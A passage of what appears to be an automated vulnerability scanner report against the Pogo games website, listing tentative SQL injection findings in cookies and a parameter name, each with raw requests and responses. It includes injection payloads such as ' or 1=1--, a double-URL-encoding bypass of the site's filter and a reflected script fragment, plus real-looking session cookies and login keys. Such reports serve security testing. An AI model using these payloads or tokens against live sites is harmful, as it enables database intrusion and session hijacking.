User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:55:51 GMT
Server: Apache-Coyote/1.1
Content-Length: 35534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...
Bowling,Sci-Fi Slots,SCRABBLE,SCRABBLE Cubes,Scrabble Tour,Showbiz Slots,Showbiz Slots II,Shuffle Bump,Shutter Island,Slingo,Sock Hop Slots,Solitaire Rush,Spades,Spider Solitaire,Spin Win,Squelchies,Stack 'em,Stellar Sweeper,Sudoku Classic,Sudoku Puzzle Blast,Sudoku Quest,Super Dominoes,Swashbucks,Swashbucks To Go,Sweet Tooth 2,Sweet Tooth To Go,Texas Hold'em Poker,The Poppit Show,The Price Is Right,Th
...[SNIP]...

Request 2

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_bottomtext HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/action/pogop/lightregview.do
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:55:51 GMT
Server: Apache-Coyote/1.1


1.20. http://www.pogo.com/home/home.jsp [com.pogo.info cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /home/home.jsp

Issue detail

The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:48:48 GMT
Server: Apache-Coyote/1.1
Content-Length: 429485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...
<a href="http://puzzle-games.pogo.com/games/stackem?pageSection=free_home_all_games1_img_stax">
...[SNIP]...

Request 2

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 301 Moved Permanently
Location: /?sls=2&site=pogo
Content-Length: 0
Date: Sun, 09 Jan 2011 01:48:49 GMT
Server: Apache-Coyote/1.1


1.21. http://www.pogo.com/home/home.jsp [com.pogo.unid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /home/home.jsp

Issue detail

The com.pogo.unid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.unid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the com.pogo.unid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856%2527; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606480040167616; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:59:22 GMT; Path=/
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:59:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 429534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...
<a href="http://puzzle-games.pogo.com/games/stackem?pageSection=free_home_all_games2_img_stax">
...[SNIP]...

Request 2

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856%2527%2527; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606480040167625; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:59:22 GMT; Path=/
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2F
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:59:22 GMT
Server: Apache-Coyote/1.1


1.22. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [s_cc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true'; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:59:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 21303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...

Request 2

GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true''; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fhotdeploy%2Fus%2Fpromotions%2Fmarketing%2Fpogoiphone%2Flanding-page.jsp
Content-Length: 0
Date: Sun, 09 Jan 2011 02:59:23 GMT
Server: Apache-Coyote/1.1


1.23. http://www.pogo.com/img/prize/en_US/cash-giveaway [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /img/prize/en_US/cash-giveaway

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19192500'%20or%201%3d1--%20 and 19192500'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /img/prize/en_US/cash-giveaway?119192500'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1

HTTP/1.1 404 /img/prize/en_US/cash-giveaway
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:58:59 GMT
Server: Apache-Coyote/1.1
Content-Length: 3797


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1\'%20and%201%3d1--%20";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="/vl/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>

Request 2

GET /img/prize/en_US/cash-giveaway?119192500'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 404 /img/prize/en_US/cash-giveaway
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:58:59 GMT
Server: Apache-Coyote/1.1
Content-Length: 3784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/?f9258%22%3E%3Cscript%3Ealert(1\'%20and%201%3d1--%20";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="/vl/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>


1.24. http://www.pogo.com/prize/prize.do [com.pogo.hp.ls.cfg cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /prize/prize.do

Issue detail

The com.pogo.hp.ls.cfg cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.hp.ls.cfg cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
